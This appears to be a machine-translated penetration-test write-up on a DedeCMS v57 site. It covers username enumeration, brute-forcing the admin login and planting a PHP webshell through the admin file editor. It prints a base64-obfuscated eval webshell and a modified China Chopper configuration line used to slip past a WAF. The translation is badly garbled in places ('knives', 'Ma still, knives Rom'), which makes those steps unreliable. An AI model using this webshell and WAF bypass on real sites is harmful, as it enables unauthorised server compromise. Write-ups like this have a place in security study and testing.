Remember once weaving dreams cms Penetration Testing
0x01 Foreword
The entire process of this test: Username enumeration - targeted violent break - sign in the background - background editing php file getshell.
0x02 Process
1, there is login user name enumeration function module defect, use this permission to enumerate the user name
2, Log function modules without a verification code, the user name by enumerating the corresponding password brute force. Sign in the background (dedecms v57)
3, began to encounter pit. File management upload files and new advertising methods can not getshell (seemingly waf). Action has a connection is reset.
4, try to directly edit the original file, the code is written.
(1) Write phpinfo (); successfully
(2) a conventional write word successfully, however, when executed, the connection is reset
(3) write word base64 encoding <php @eval (base64_decode ($ _ POST [ '0nth3way']));??>, The encoded data can be successfully performed after the
5, knives modify the configuration file caidao.conf below, you can connect a word Trojan.
<PHP_BASE> ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFtpZF0pKTs%%3D&id=%s </PHP_BASE>
6, choppers successfully connected to the word. Permissions: IIS users
7, named wkds.exe see the process, the feeling is protection software, did not get to the bottom.
8, the next day cold.
(1) Ma still, knives Rom. Can execute phpinfo () ;, can not perform system ( 'whoami'), see also phpinfo correlation function is not disabled ah. Question mark face? ? ? Seeking answers 0.0
(2) the background can not be edited files
0x03 Postscript
This test is to get this in mind:
(1) may encode traffic data bypass waf, chopper configuration change connection.
(2) Carpe Diem